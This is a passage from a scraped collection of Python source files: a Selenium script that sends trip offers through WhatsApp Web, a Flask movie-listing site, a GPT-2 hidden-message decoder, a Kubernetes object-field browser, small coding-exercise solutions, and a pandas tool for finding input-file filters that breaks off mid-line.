[data_from_json]))\n\n","repo_name":"hooloobooroodkoo/Task2_Navigate_Json","sub_path":"json_navigation.py","file_name":"json_navigation.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"74227199854","text":"# from datetime 
import time\r\nfrom os import get_inheritable\r\nimport time\r\nimport unittest\r\nfrom selenium import webdriver\r\nfrom selenium.common.exceptions import NoSuchElementException\r\nfrom selenium.webdriver.common import by\r\nfrom selenium.webdriver.common import keys\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nimport pandas as pd\r\n\r\nCHROME_PROFILE_PATH = \"user-data-dir=C:\\\\Users\\\\osnas\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\"\r\n\r\nclass HomePageTests(unittest.TestCase):\r\n\r\n def setUp(self) -> None:\r\n \r\n # self.driver = webdriver.Chrome(executable_path=r'./chromedriver.exe')\r\n pathChromeDriver = 'C:/Users/osnas/Documents/scripts_python/wpsender/chromedriver.exe'\r\n s = Service(pathChromeDriver)\r\n \r\n options = webdriver.ChromeOptions()\r\n options.add_argument(CHROME_PROFILE_PATH)\r\n self.driver = webdriver.Chrome(service=s,options=options)\r\n driver = self.driver\r\n driver.get(\"https://web.whatsapp.com/\")\r\n driver.maximize_window()\r\n driver.implicitly_wait(30)\r\n\r\n def test_getMsgInterface(self):\r\n # contact_errors = pd.DataFrame(columns=[\"celular\"])\r\n\r\n # contact_names = ['Daniel Lesmes','Humbewrewassfd','Fabio Sarmiento']\r\n # Obtener el input donde se ingresa el número de contacto para buscar el chat\r\n searchBox = '//*[@id=\"side\"]/div[1]/div/label/div/div[2]'\r\n\r\n # inputSearch = self.driver.find_element(By.XPATH,'//*[@id=\"side\"]/div[1]/div/label/div/div[2]')\r\n\r\n data = pd.read_excel(\"Data.xlsx\")\r\n viajes = pd.read_excel(\"Viajes.xlsx\")\r\n\r\n for index, row in data.iterrows():\r\n contact_name = row['contact_name']\r\n\r\n try:\r\n # Esperar a que cargue la página, máximo por 15 segundos\r\n # Asegurarse de que está limpio el input\r\n wait = WebDriverWait(self.driver,30)\r\n inputSearch = wait.until(lambda driver:self.driver.find_element(By.XPATH,searchBox))\r\n\r\n inputSearch.clear()\r\n\r\n # ingresar el número de contacto\r\n inputSearch.send_keys(contact_name)\r\n\r\n contact_xpath = '//span[@title=\"{}\"]'.format(contact_name)\r\n\r\n\r\n # contact_xpath = '//*[@id=\"pane-side\"]/div[1]/div/div/div[7]'\r\n\r\n # inputSearch = wait.until(lambda driver:self.driver.find_element(By.XPATH,searchBox))\r\n # contact_title = self.driver.find_element(By.XPATH,contact_xpath)\r\n contact_title = wait.until(lambda driver:self.driver.find_element(By.XPATH,contact_xpath))\r\n contact_title.click()\r\n\r\n inputMessage_xpath = '//*[@id=\"main\"]/footer/div[1]/div/span[2]/div/div[2]/div[1]/div/div[2]'\r\n inputMessage = wait.until(lambda driver:self.driver.find_element(By.XPATH,inputMessage_xpath))\r\n\r\n # mensaje = row['message']\r\n # inputMessage.send_keys(mensaje)\r\n\r\n for index2, row2 in viajes.iterrows():\r\n msg = '*Tipo de vehículo*: {}'.format(row2['tipo_vehiculo'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.LEFT_SHIFT,Keys.ENTER)\r\n msg = '*Origen*: {}'.format(row2['origen'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.LEFT_SHIFT,Keys.ENTER)\r\n msg = '*Destino*: {}'.format(row2['destino'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.LEFT_SHIFT,Keys.ENTER)\r\n msg = 
'*Carrocería*: {}'.format(row2['carroceria'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.LEFT_SHIFT,Keys.ENTER)\r\n msg = '*Flete*: {}'.format(row2['flete'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.LEFT_SHIFT,Keys.ENTER)\r\n msg = '*Observaciones*: {}'.format(row2['observaciones'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.ENTER)\r\n \r\n # inputMessage.send_keys(Keys.ENTER)\r\n\r\n except:\r\n error_msg = \"No se puedo enviar el mensaje a: {}\".format(contact_name)\r\n print(error_msg)\r\n\r\n def tearDown(self) -> None:\r\n self.driver.quit()\r\n\r\nif __name__ == '__main__':\r\n unittest.main(verbosity=2)","repo_name":"ossev/wpsender","sub_path":"main1.py","file_name":"main1.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"3680462107","text":"from flask import Flask, render_template, url_for\napp = Flask(__name__)\nfrom model import *\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n showtimes = Showtime.query.join(Movie,Movie.movieID == Showtime.movieID).order_by(Showtime.price,Showtime.showtime).all()\n movies = Movie.query.all()\n theaters = Theater.query.all()\n return render_template('home.html',showtimes=showtimes, movies=movies, theaters=theaters)\n\n@app.route(\"/movies\")\ndef getMovies():\n moviesList = Movie.query.all()\n return render_template('movies.html',title='Now Playing', moviesList=moviesList)\n\n@app.route(\"/theaters\")\ndef getTheaters():\n theaters = Theater.query.all()\n return render_template('theaters.html',title='Theaters',theaters=theaters)\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html',title='About')\n\n@app.route(\"/help\")\ndef help():\n return render_template('help.html',title='Help')\n\nif __name__ == \"__main__\":\n app.run() ","repo_name":"Skykist/Tixter","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"40305317890","text":"import os\nfrom transformers import GPT2LMHeadModel, GPT2Tokenizer\nimport torch\nimport re\nimport json\n\n\nclass Decoder:\n def __init__(self, has_encoder=False, dic=\"decode_dict.json\"):\n self.type = 'encoder' if has_encoder else 'simple'\n if self.type == 'encoder':\n self.decode_dict = json.load(open(dic, 'r'))\n self.decode_pattern = re.compile(r\"\\{([a-z \\{\\}\\?]{1,2})\\}\")\n def decode(self, string):\n if self.type == 'simple':\n return string\n \n return re.sub(self.decode_pattern, lambda m: self.decode_dict[m.group(0)], string).capitalize()\n \nprint(\"Initializing model...\\n\")\n\n# If you have save the model locally use these commands to import the model\n# tokenizer = GPT2Tokenizer.from_pretrained(\"/opt/NLP_Models/gpt2-model/\", local_files_only=True)\n# model = GPT2LMHeadModel.from_pretrained(\"/opt/NLP_Models/gpt2-model/\", local_files_only=True)\n\ntokenizer = GPT2Tokenizer.from_pretrained('gpt2')\nmodel = GPT2LMHeadModel.from_pretrained('gpt2')\n\ncharset = [' ', 'a', 'i', 'n', 'm', '{', '}', 'd', 'l', 's', 'r', 'h', 'o', 'u', 'e', 'y', 'b', 'x', 't', 'g', 'j', 'z', 'v', 'k', 'c', 'p', 'f', '?', 'w', 'q']\ninit_len = 5\ndecoder = Decoder(has_encoder=os.path.exists(\"decode_dict.json\"))\n\ntext = input(\"Input the output of the model to reveal the message: \")\n\nin_seq = torch.tensor(tokenizer.encode(text))\ncontext = in_seq[:init_len]\nmsg = 
\"\"\nk=len(charset)\nwith torch.no_grad():\n for i in range(init_len, in_seq.shape[0]):\n output = model(context)\n msg += charset[torch.where(torch.topk(output[0][-1, :], k).indices == in_seq[i])[0][0].item()]\n context = torch.cat((context, in_seq[i].unsqueeze(0)))\n\nprint(\"\\nGenerated output: \")\nprint(decoder.decode(msg))","repo_name":"Mahan-AK/GPTCrypt","sub_path":"RevealMSG.py","file_name":"RevealMSG.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"11641210439","text":"from kubernetes import client\nfrom flask import Flask, render_template, request, jsonify, abort\nfrom six import iteritems\n\napp = Flask(__name__)\n\n\nclass KuberAPI:\n def __init__(self):\n pass\n\n Deployment = {'AppsV1beta1': 'AppsV1beta1Deployment',\n 'ExtensionsV1beta1': 'ExtensionsV1beta1Deployment',\n 'v1': 'V1Deployment'}\n\n Pod = {'v1': 'V1Pod'}\n\n ReplicaSet = {'v1': 'V1ReplicaSet',\n 'v1beta1': 'V1beta1ReplicaSet',\n 'v1beta2': 'V1beta2ReplicaSet'}\n\n ReplicationController = {'v1': 'V1ReplicationController'}\n\n StatefulSet = {'v1': 'V1StatefulSet',\n 'v1beta1': 'V1beta1StatefulSet',\n 'v1beta2': 'V1beta2StatefulSet'}\n\n Service = {'v1api': 'V1APIService',\n 'v1': 'V1Service',\n 'v1beta1': 'V1beta1APIService'}\n\n Volume = {'v1': 'V1Volume'}\n\n PersistentVolume = {'v1': 'V1PersistentVolume'}\n\n NameSpace = {'v1': 'V1Namespace'}\n\n DaemonSet = {'v1': 'V1DaemonSet',\n 'v1beta1': 'V1beta1DaemonSet',\n 'v1beta2': 'V1beta2DaemonSet'}\n\n Job = {'v1': 'V1Job'}\n\n CronJob = {'v1beta1': 'V1beta1CronJob',\n 'v2alpha1': 'V2alpha1CronJob'}\n\n Role = {'v1': 'V1Role',\n 'v1alpha1': 'V1alpha1Role',\n 'v1beta1': 'V1beta1Role'}\n\n RoleBinding = {'v1beta1': 'V1beta1RoleBinding',\n 'v1alpha1': 'V1alpha1RoleBinding',\n 'v1': 'V1RoleBinding'}\n\n ClusterRole = {'v1': 'V1ClusterRole',\n 'v1alpha1': 'V1alpha1ClusterRole',\n 'v1beta1': 'V1beta1ClusterRole'}\n\n ClusterRoleBinding = {'v1beta1': 'V1beta1ClusterRoleBinding',\n 'v1alpha1': 'V1alpha1ClusterRoleBinding',\n 'v1': 'V1ClusterRoleBinding'}\n\n\nclass Leaves:\n def __init__(self, name, attr_name=None):\n self.has_child_attr = False\n self.__name__ = name\n self.attr_name = attr_name\n\n\nclass KuberParser:\n def __init__(self, Object=None, ObjectName=None, attr_name=None):\n self.has_child_attr = True\n self.is_list_attr = False\n if Object:\n self.object = Object\n if ObjectName:\n self._name_parser(ObjectName, attr_name)\n self.attr_name = attr_name\n\n def _name_parser(self, name, attr_name):\n if name.startswith('dict') or name.startswith('datetime') or name.startswith('str') \\\n or name.startswith('int') or name.startswith('bool') or name.startswith('list[str]') \\\n or name.startswith('object') or name.startswith('list[int]'):\n\n self.object = Leaves(name, attr_name)\n self.has_child_attr = False\n elif name.startswith('list['):\n name = name.split('list[')[1].split(']')[0]\n self.object = getattr(client, name)\n self.is_list_attr = True\n else:\n self.object = getattr(client, name)\n\n @property\n def name(self):\n return self.object.__name__\n\n def child_object(self, attr):\n return getattr(client, self.object.swagger_types[attr])()\n\n\n@app.route('/node/', methods=['post', 'get'])\ndef node(init_id):\n args = request.args.get('object_name').split('#')\n if args == ['', '']:\n version, attr_name = init_id.split('-')\n parent_name = getattr(KuberAPI, attr_name)[version]\n parent_attr = 'root'\n else:\n parent_name, attr_name, parent_attr = 
args\n\n print(request.args.get('object_name'), args)\n if not parent_name:\n parent_name = 'AppsV1beta1Deployment'\n attr_name = 'Deployment'\n parent_attr = 'root'\n attr = KuberParser(ObjectName=parent_name, attr_name=attr_name)\n res = {\"id\": attr.name + '#' + attr.attr_name + \"#\" + parent_attr, \"text\": attr.attr_name, 'children': []}\n for key, value in iteritems(attr.object.swagger_types):\n child = KuberParser(ObjectName=value, attr_name=attr.object.attribute_map[key])\n if child.has_child_attr:\n if child.is_list_attr:\n item = {\"id\": child.name + '#' + child.attr_name + ' | list' + '#' + attr.name, \"text\": child.attr_name + ' | list',\n \"children\": child.has_child_attr}\n else:\n item = {\"id\": child.name + '#' + child.attr_name + '#' + attr.name, \"text\": child.attr_name,\n \"children\": child.has_child_attr}\n else:\n item = {\"id\": child.name + '#' + child.attr_name + '#' + attr.name, \"text\": child.attr_name + ' | ' + child.name + '',\n \"type\": 'leaf'}\n res['children'].append(item)\n return jsonify(res)\n\n\n@app.route('/get_object')\ndef get_object():\n \"\"\"\n return API objects\n :return:\n \"\"\"\n obj = [i for i in KuberAPI.__dict__.keys() if not i.startswith('__')]\n return jsonify({'obj': obj})\n\n\n@app.route('/get_version')\ndef get_version():\n \"\"\"\n return API version\n :return:\n \"\"\"\n obj = request.args.get('obj')\n if not obj:\n abort(400)\n obj = getattr(KuberAPI, obj)\n versions = [k for k, _ in iteritems(obj)]\n return jsonify({'versions': versions})\n\n\n@app.route('/index')\ndef index():\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n\n","repo_name":"liverpoolpjy/kuber-yaml-helper","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"30761281286","text":"class Solution:\n def minIncrementForUnique(self, nums: List[int]) -> int:\n \n nums.sort()\n count = dict()\n ans = 0\n largest = 0\n for i in range(len(nums)):\n \n if(count.get(nums[i]) == None):\n count[nums[i]] = 1\n else:\n ans += nums[i - 1] - nums[i] + 1\n nums[i] = nums[i -1] + 1 \n count[nums[i]] = 1\n \n \n return ans","repo_name":"albetre21/competitive-programming","sub_path":"0945-minimum-increment-to-make-array-unique/0945-minimum-increment-to-make-array-unique.py","file_name":"0945-minimum-increment-to-make-array-unique.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"15190364235","text":"from is_substring import is_substring\n\ndef is_rotation(s1, s2):\n\t\"\"\" checks whether string 2 (s2) is a rotation of string 1 (s1) \n\tusing only 1 call to is_substring\"\"\"\n\n\t# we concat one string because if s2 is a rotation of s1, \n\t# this will \"remake\" or \"reconstitute\" s2 in the middle of check_string\n\tcheck_string = s1 + s1\n\n\treturn is_substring(check_string, s2)\n\nassert is_rotation(\"erbottlewat\", \"waterbottle\") == True\nassert is_rotation(\"waterbottle\", \"botwater\") == False","repo_name":"jcshott/interview_prep","sub_path":"cracking_code_interview/ch1_arrays-strings/rotation.py","file_name":"rotation.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"70850080814","text":"# 문제\n# 예제를 보고 규칙을 유추한 뒤에 별을 찍어 보세요.\n#\n# 입력\n# 첫째 줄에 N이 주어진다.\n# N은 항상 3의 제곱꼴인 수이다. 
(1, 3, 9, 27, ...) (N=3k, 0 ≤ k < 8)\n#\n# 출력\n# 첫째 줄부터 N번째 줄까지 별을 출력한다.\n\n\ndef draw_star(mod, i, j):\n if (i // mod) % 3 == 1 and (j // mod) % 3 == 1:\n print(\" \", end=\"\")\n\n else:\n if mod // 3 == 0:\n print(\"*\", end=\"\")\n\n else:\n draw_star(mod // 3, i, j)\n\n\nn = int(input())\n\nfor i in range(n):\n for j in range(n):\n draw_star(n, i, j)\n print()\n","repo_name":"alstn2468/baekjoon-online-judge","sub_path":"2400~2499/2447.py","file_name":"2447.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"ko","doc_type":"code","stars":21,"dataset":"github-code","pt":"56"} +{"seq_id":"3111543179","text":"\"\"\"\nGiven the roots of two binary trees root and subRoot, return true \nif there is a subtree of root with the same structure and node \nvalues of subRoot and false otherwise.\n\nA subtree of a binary tree tree is a tree that consists of a node \nin tree and all of this node's descendants. The tree tree could \nalso be considered as a subtree of itself.\n\n \n\nExample 1:\n\n\nInput: root = [3,4,5,1,2], subRoot = [4,1,2]\nOutput: true\nExample 2:\n\n\nInput: root = [3,4,5,1,2,null,null,null,null,0], subRoot = [4,1,2]\nOutput: false\n \n\nConstraints:\n\nThe number of nodes in the root tree is in the range [1, 2000].\nThe number of nodes in the subRoot tree is in the range [1, 1000].\n-104 <= root.val <= 104\n-104 <= subRoot.val <= 104\n\nDifficulty: Easy\nCompleted: 6/21/2022\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def check(self, root, subRoot): # checks two trees for sameness\n if not (root and subRoot): return root == subRoot # one or both of the nodes are NULL\n return root.val == subRoot.val and \\\n self.check(root.left, subRoot.left) and \\\n self.check(root.right, subRoot.right) # check that node values and children are the same\n\n def isSubtree(self, root: Optional[TreeNode], subRoot: Optional[TreeNode]) -> bool:\n if not (root and subRoot): return root == subRoot # one or both of the nodes are NULL \n if self.check(root, subRoot): return True # call the check function\n return self.isSubtree(root.left, subRoot) or \\\n self.isSubtree(root.right, subRoot) # see if there's a match for either child\n\n\"\"\"\nExplanation:\n\nThe check function checks for sameness for two nodes.\n\nWe first check the root node for sameness with the subtree\nnode. 
If we find that those are unidentical, we move on to\ncheck the children of the root.\n\nTime Complexity: O(N)\nSpace Complexity: O(1)\n\"\"\"\n","repo_name":"joburn5000/blind_75_challenge","sub_path":"tree/subtree_of_another_tree.py","file_name":"subtree_of_another_tree.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"20633436663","text":"import datetime\nimport functools\nimport itertools\nimport logging\nimport operator\nimport random\nimport statistics\n\nfrom functools import reduce\n\nimport pandas as pd\nfrom pandas.api.types import is_string_dtype, is_integer_dtype, is_bool_dtype\n\nNATURAL_DIVIDER_THRESOLD = 30\nMULTIPLE_COMBINATION_FILTERS = 5000\nMULTI_COL_FILTER_RATIO = 0.05\nTODAY = datetime.date(2019, 4, 1)\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef isin_row(row, df):\n \"\"\"Given a 'row' (specific combination of values for the DF columns) this function searches the 'df'\n for that same combination of values, return True if the 'df' has that exact combination, False if otherwise.\n\n :param row: (DataFrame) single row df\n :param df: (DataFrame) df where the row is searched\n :return: Boolean\n \"\"\"\n cols = df.columns\n bool_series = functools.reduce(lambda x, y: x & y, [df[col].isin(row[col]) for col in cols])\n return bool_series.any()\n\n\nclass SingleColumnFilters:\n date_slices = {\n 'one_month_period': TODAY - datetime.timedelta(days=31),\n 'one_quarter_period': TODAY - datetime.timedelta(days=92),\n 'six_months_period': TODAY - datetime.timedelta(days=183),\n 'one_year_period': TODAY - datetime.timedelta(days=365),\n 'mtd': datetime.date(TODAY.year, TODAY.month, 1),\n 'ytd': datetime.date(TODAY.year, 1, 1)\n }\n\n def __init__(self, input_df, resulting_df, merging_cols=None, input_file_name=None):\n self.extended_resulting_df = pd.DataFrame()\n self.filtering_quick_gains = list()\n self.final_df = pd.DataFrame()\n self.input_df = input_df\n self.input_file_name = input_file_name\n self.matching_cols = list()\n self.matching_id_cols = list()\n self.merging_cols = merging_cols\n self.natural_dividers_dtypes = dict()\n self.overall_percentage = float()\n self.resulting_df = resulting_df\n self.usage_percentage = dict()\n\n def make_analysis(self, apply_filter=False):\n \"\"\"Runs functions of the class SingleColumnFilters on an object of the class to get the best single\n column filter while also generating the data for the 'print_report' and 'generate_data_usage_plot'.\n\n Parameters:\n self (object): an object of the class SingleColumnFilters\n Returns:\n None\n \"\"\"\n logging.info(\"Starting Analisis\")\n self.find_matching_cols()\n if not self.matching_cols:\n logging.warning('Without shared columns this tool is worthless, consider renaming columns')\n return\n self._merge_input_to_final()\n self._set_final_df_to_work_with()\n self.columns_usage_percentage()\n logging.info(\"Column usage percentage:\")\n logging.info(self.usage_percentage)\n self.get_dtypes_for_natural_divider_cols()\n for slicing_col, dtype in self.natural_dividers_dtypes.items():\n if 'date' in dtype:\n self._determine_date_range_filters(slicing_col)\n else:\n self._determine_category_col_filters(slicing_col)\n self._determine_best_slicing_col_filter()\n if apply_filter:\n self._filter_and_save_inputfile(self.input_file_name)\n\n def find_matching_cols(self):\n \"\"\"Compares the columns in 'input_df' and 'resulting_df' to find columns present in both DF, a 
second list is\n calculated for columns also having id or Id in their name, to be used for merging the DFs if no 'merging_cols'\n list is provided.\n\n \"\"\"\n self.matching_cols = list(set(self.input_df.columns).intersection(self.resulting_df.columns))\n self.matching_id_cols = [col_name for col_name in self.matching_cols if 'id' in col_name or 'Id' in col_name]\n\n def _merge_input_to_final(self):\n \"\"\"Merges the 'input_df' to 'final_df', if a list of columns was passed to the instance the merge is executed\n on those columns, otherwise on all 'matching_id_cols'\n\n \"\"\"\n input_df_cols = list(set(self.input_df.columns) - set(self.matching_cols))\n try:\n if self.merging_cols:\n self._merge_input_to_final_on_merging_cols(input_df_cols)\n else:\n self._merge_input_to_final_on_matching_id_cols(input_df_cols)\n except Exception as e:\n logging.warning(\"\"\"The DFs have some 'id' columns to merge them but an exception\n araises when trying merge\"\"\")\n logging.warning(e)\n pass\n else:\n self.matching_cols = self.input_df.columns\n\n def _merge_input_to_final_on_merging_cols(self, input_df_cols):\n input_df_cols.extend(self.merging_cols)\n self.extended_resulting_df = self.resulting_df.merge(\n self.input_df[input_df_cols],\n how='left', on=self.merging_cols\n )\n\n def _merge_input_to_final_on_matching_id_cols(self, input_df_cols):\n input_df_cols.extend(self.matching_id_cols)\n self.extended_resulting_df = self.resulting_df.merge(\n self.input_df[input_df_cols],\n how='left', on=self.matching_id_cols\n )\n\n def _set_final_df_to_work_with(self):\n \"\"\"Checks if the 'input_df' was merged to 'final_df', to work with that merged DF, which increases the scope\n of the analysis because all columns are considered, otherwise only the 'matching cols'.\n\n \"\"\"\n if not self.extended_resulting_df.empty:\n self.final_df = self.extended_resulting_df\n else:\n self.final_df = self.resulting_df\n logging.warning('The input df could not be merged into final, that decreases the chances of success')\n\n def columns_usage_percentage(self):\n \"\"\"Preliminary analysis that measure the ratio of unique values in 'input_df' that make it to the 'final_df',\n the lower the percentage the more file you are reading in vain, in that case a MySQL query adjustment or\n reading the table using Athena to filter a bucket would increase speed.\n\n \"\"\"\n for col in self.matching_cols:\n if 'date' in col or is_bool_dtype(self.input_df[col]):\n pass\n matching_rows = set(self.input_df[col].unique()).intersection(self.final_df[col].unique())\n if not matching_rows:\n logging.info('{} is in both DFs, but no matching data was found'.format(col))\n percentage = 0\n if col in self.merging_cols:\n raise ValueError('No keys to perform merge')\n else:\n percentage = len(matching_rows) / len(self.input_df[col].unique())\n self.usage_percentage.update({col: percentage})\n self.overall_percentage = statistics.mean(self.usage_percentage.values())\n\n def get_dtypes_for_natural_divider_cols(self):\n \"\"\"For each column in 'input_df' determine its dtype (many columns have dtype object which is not useful\n for this analysis). 
And add to a dictionary if 'is_natural_divider'\n\n \"\"\"\n for col in self.input_df.columns:\n if 'date' in col or 'Date' in col:\n self.input_df[col] = pd.to_datetime(self.input_df[col])\n self.natural_dividers_dtypes.update({col: 'date'})\n elif is_string_dtype(self.input_df[col]):\n if self._is_natural_divider(self.input_df[col]):\n self.natural_dividers_dtypes.update({col: 'string'})\n elif is_integer_dtype(self.input_df[col]):\n if self._is_natural_divider(self.input_df[col]):\n self.natural_dividers_dtypes.update({col: 'integer'})\n elif is_bool_dtype(self.input_df[col]):\n self.natural_dividers_dtypes.update({col: 'boolean'})\n\n def _is_natural_divider(self, df_series):\n \"\"\"Determines if a column of the 'input_df' would serve as a good filter, if the ratio of unique values to\n the number of rows is high the column is consider a 'natural divider' date columns are always natural dividers,\n but this function they may not show as, be cautious.\n\n :param df_series: (pandas series) series to be checked to see if it is a 'natural divider'\n :return: Boolean\n \"\"\"\n unique_rows = len(df_series.unique())\n if unique_rows == 1:\n return\n total_rows = len(df_series)\n ratio = total_rows / unique_rows\n logging.info('Column: {} has {} unique rows in {} rows, a {} to 1 relationship'.format(\n df_series._name, str(unique_rows), str(total_rows), str(ratio)))\n if ratio > NATURAL_DIVIDER_THRESOLD and self.usage_percentage[df_series._name] != 1:\n return 1\n\n def _handle_na_in_date_cols(self, col):\n \"\"\"This function checks for nans values in the 'input_df' DF for a given column, if there are such values\n in the 'input_df' but not in the 'final_df' it has found a valuable filter. It adds that finding to the\n 'filtering_quick_gains' list.\n\n :param col: (str) the name of the column in the 'input_df'\n \"\"\"\n number_of_nans = self.input_df[col].isna().sum()\n if number_of_nans and self.final_df[col].isna().sum() == 0:\n logging.info('Found query optimizing chance in col: {}, filter: nan'.format(col))\n self.filtering_quick_gains.append({\n 'column': col,\n 'dtype': 'date',\n 'filter_out': 'nan',\n 'useless_rows': number_of_nans,\n 'weighted_benefit': number_of_nans\n })\n\n def _determine_date_range_filters(self, col):\n \"\"\"For each of the time ranges determined in the 'date_slices' class dictionary this functions checks if\n there is data in the 'final_df' if not it continues with the next date range, otherwise it checks if there is\n data for that same date range in the 'input_df', if so, there is un needed rows in the 'input_df' that should\n be filtered. 
That information is stored in function variables to later, determine the best date range filter\n that can be applied to that column, that information is stored in a dictionary and appended to\n 'filtering_quick_gains' an instance list.\n\n :param col: (str) the name of the column in the 'input_df'\n \"\"\"\n self._handle_na_in_date_cols(col)\n non_na_inputdf = self.input_df.dropna(subset=[col])\n self.final_df[col] = pd.to_datetime(self.final_df[col])\n non_na_finaldf = self.final_df.dropna(subset=[col])\n weighted_benefit = 0\n for period, date_ in self.date_slices.items():\n lesser_date_final = non_na_finaldf.loc[non_na_finaldf[col] < date_]\n if not len(lesser_date_final):\n lesser_date_input = non_na_inputdf.loc[non_na_inputdf[col] < date_]\n if len(lesser_date_input) > weighted_benefit:\n logging.info('Found query optimizing chance in col: {}, filter: {}'.format(col, period))\n weighted_benefit = useless_rows = len(lesser_date_input)\n the_column = col\n filter_out = (period, date_)\n if weighted_benefit > 0:\n self.filtering_quick_gains.append({\n 'column': the_column,\n 'dtype': 'date',\n 'filter_out': filter_out,\n 'useless_rows': useless_rows,\n 'weighted_benefit': weighted_benefit\n })\n\n def _determine_category_col_filters(self, col):\n \"\"\"If a columns 'col' unique values are not fully present in the 'final_df' this function determines the\n unique values in the 'input_df' for the column 'col' not present in the 'resulting_df' / 'final_df' and\n adds that information to a instance dictionary for further analysis\n\n :param col: (str) the name of the column in the 'input_df'\n \"\"\"\n if self.usage_percentage[col] == 1:\n return\n unused_categos = set(self.input_df[col].unique()) - set(self.final_df[col].unique())\n unused_inputdf_rows = len(self.input_df.loc[self.input_df[col].isin(unused_categos)])\n expected_unused_rows_per_catego = unused_inputdf_rows / len(unused_categos)\n self.filtering_quick_gains.append({\n 'column': col,\n 'dtype': self.natural_dividers_dtypes[col],\n 'filter_out': unused_categos,\n 'useless_rows': unused_inputdf_rows,\n 'weighted_benefit': expected_unused_rows_per_catego\n })\n if len(unused_categos) > 100:\n logging.info(\n \"Found query optimizing chance in col: {}, reading ({}) unused rows, consider filtering out: {}\".format(\n col, unused_inputdf_rows, random.sample(unused_categos, 100)))\n else:\n logging.info(\n \"Found query optimizing chance in col: {}, reading ({}) unused rows, consider filtering out: {}\".format(\n col, unused_inputdf_rows, unused_categos))\n\n def find_largest_unused_catego_in_column(self, col):\n \"\"\"Checks which value in a column in in 'input_df' that does not appear in 'final_df' appears the must\n amount of times.\n\n :param col: (str) the name of the column\n \"\"\"\n unused_categos = set(self.input_df[col].unique()) - set(self.final_df[col].unique())\n if not unused_categos:\n raise ValueError(\"This column has no unused categories\")\n category_potential = dict()\n for category in unused_categos:\n unused_rows_for_category = len(self.input_df.loc[self.input_df[col] == category])\n category_potential.update({category: unused_rows_for_category})\n return max(category_potential.items(), key=operator.itemgetter(1))[0]\n\n def _determine_best_slicing_col_filter(self):\n \"\"\"For the items in 'filtering_quick_gains' fin the one which yields the must benefit;\n two deciding factors: total number of rows that can be filtered (the larger the better),\n the number of elements to filter out (the larger the worse)\n\n 
\"\"\"\n self.max_weighted_benefit = max([x['weighted_benefit'] for x in self.filtering_quick_gains])\n max_eficiency_potential_info = [item for item in self.filtering_quick_gains\n if item['weighted_benefit'] == self.max_weighted_benefit][0]\n if max_eficiency_potential_info['dtype'] != 'date':\n category_to_filter = self.find_largest_unused_catego_in_column(max_eficiency_potential_info['column'])\n logging.info(\"The suggested column to filter is {}, recommended value to filter: {}\".format(\n max_eficiency_potential_info['column'], category_to_filter\n ))\n self.best_filter = (\n max_eficiency_potential_info['column'],\n category_to_filter,\n max_eficiency_potential_info['dtype'],\n max_eficiency_potential_info['excpeted_unused_rows_per_catego'],\n )\n else:\n logging.info(\"The suggested column to filter is {}, recommended period to filter: {}\".format(\n max_eficiency_potential_info['column'], max_eficiency_potential_info['filter_out'][0]\n ))\n self.best_filter = (\n max_eficiency_potential_info['column'],\n max_eficiency_potential_info['filter_out'],\n max_eficiency_potential_info['dtype'],\n max_eficiency_potential_info['weighted_benefit'],\n max_eficiency_potential_info['weighted_benefit'] / len(self.input_df)\n )\n\n def _filter_and_save_inputfile(self, input_file_name):\n \"\"\"Applies the best filter, result of running 'analyze_one_input_to_result' to the input_df and saves it,\n replacing the original file.\n\n Parameters:\n input_file_name (string): the path and name of the input csv\n Returns:\n None\n \"\"\"\n # filter input DF with best filter found in analisis\n if self.best_filter[2] == 'date':\n nan_rows = self.input_df.loc[self.input_df[self.best_filter[0]].isnull()]\n self.input_df = self.input_df.loc[\n self.input_df[self.best_filter[0]] > self.best_filter[1][1]\n ]\n self.input_df = pd.concat([self.input_df, nan_rows])\n else:\n self.input_df = self.input_df.loc[\n self.input_df[self.best_filter[0]] != self.best_filter[1]\n ]\n self.input_df.to_csv(input_file_name, index=False, encoding='utf-8', escapechar='\\\\')\n\n\nclass MultiColumnFilters(SingleColumnFilters):\n\n def __init__(self, input_df, resulting_df, merging_cols=None):\n self.input_df 